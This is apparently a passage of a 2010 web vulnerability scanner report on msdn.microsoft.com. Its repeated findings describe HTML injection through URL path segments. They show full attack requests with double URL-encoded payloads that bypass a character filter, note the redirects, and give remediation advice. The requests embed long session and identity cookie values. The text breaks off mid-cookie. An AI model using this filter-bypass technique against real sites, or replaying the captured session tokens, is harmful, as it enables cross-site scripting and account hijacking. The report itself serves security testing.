HTTP/1.1 200 OK Cache-Control: private Content-Length: 30835 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/cc300389.aspx?5db99"><a>00ccaba71ba=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b5a%2522%253e%253ca%253e034bccb92c5 was submitted in the REST URL parameter 1. This input was echoed as 76b5a"><a>034bccb92c5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us76b5a%2522%253e%253ca%253e034bccb92c5/library(d=loband HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:59 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us76b5a"><a>034bccb92c5/library(d=loband" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb1e%2522%253e%253ca%253e76f5534360f was submitted in the REST URL parameter 1. This input was echoed as dfb1e"><a>76f5534360f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usdfb1e%2522%253e%253ca%253e76f5534360f/library/aa155072.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:28 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdfb1e"><a>76f5534360f/library/aa155072" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9866b%2522%253e%253ca%253e65c7083c4f8 was submitted in the REST URL parameter 2. This input was echoed as 9866b"><a>65c7083c4f8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9866b%2522%253e%253ca%253e65c7083c4f8/aa155072.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:44 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9866b"><a>65c7083c4f8/aa155072" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d906d%2522%253e%253ca%253eab4656b12f7 was submitted in the REST URL parameter 3. This input was echoed as d906d"><a>ab4656b12f7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa155072.aspxd906d%2522%253e%253ca%253eab4656b12f7 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa155072.aspxd906d"><a>ab4656b12f7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc85%2522%253e%253ca%253e836b0a1a57e was submitted in the REST URL parameter 1. This input was echoed as fbc85"><a>836b0a1a57e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usfbc85%2522%253e%253ca%253e836b0a1a57e/library/aa155073.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfbc85"><a>836b0a1a57e/library/aa155073" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc097%2522%253e%253ca%253e0c9278f4fd1 was submitted in the REST URL parameter 2. This input was echoed as fc097"><a>0c9278f4fd1 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryfc097%2522%253e%253ca%253e0c9278f4fd1/aa155073.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 